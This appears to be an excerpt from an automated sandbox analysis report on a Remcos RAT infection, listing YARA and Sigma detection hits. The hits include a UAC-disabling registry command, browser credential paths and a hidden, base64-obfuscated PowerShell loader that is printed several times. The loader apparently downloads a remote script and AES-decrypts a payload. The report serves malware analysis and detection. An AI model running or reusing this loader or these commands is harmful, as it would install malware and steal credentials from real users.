          10.2.powershell.exe.8c21288.2.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            10.2.powershell.exe.8c21288.2.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              10.2.powershell.exe.8c21288.2.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                10.2.powershell.exe.8c21288.2.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x69308:$a1: Remcos restarted by watchdog!
                • 0x69880:$a3: %02i:%02i:%02i:%03i
                10.2.powershell.exe.8c21288.2.unpackREMCOS_RAT_variantsunknownunknown
                • 0x63594:$str_a1: C:\Windows\System32\cmd.exe
                • 0x63510:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x63510:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x63a10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x64010:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x63604:$str_b2: Executing file:
                • 0x6444c:$str_b3: GetDirectListeningPort
                • 0x63e00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x63f80:$str_b7: \update.vbs
                • 0x6362c:$str_b9: Downloaded file:
                • 0x63618:$str_b10: Downloading file:
                • 0x636bc:$str_b12: Failed to upload file:
                • 0x64414:$str_b13: StartForward
                • 0x64434:$str_b14: StopForward
                • 0x63ed8:$str_b15: fso.DeleteFile "
                • 0x63e6c:$str_b16: On Error Resume Next
                • 0x63f08:$str_b17: fso.DeleteFolder "
                • 0x636ac:$str_b18: Uploaded file:
                • 0x6366c:$str_b19: Unable to delete:
                • 0x63ea0:$str_b20: while fso.FileExists("
                • 0x63b49:$str_c0: [Firefox StoredLogins not found]
                Click to see the 7 entries
                SourceRuleDescriptionAuthorStrings
                amsi32_1200.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
                  amsi32_7400.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
                    amsi32_7976.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
                      amsi32_1784.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
                        amsi32_1476.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
                          Click to see the 11 entries

                          System Summary

                          barindex
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNh
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNh
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNh
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qmkvvvalmabsljlqxrjezibbbpjp", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qmkvvvalmabsljlqxrjezibbbpjp", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTe
                          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOw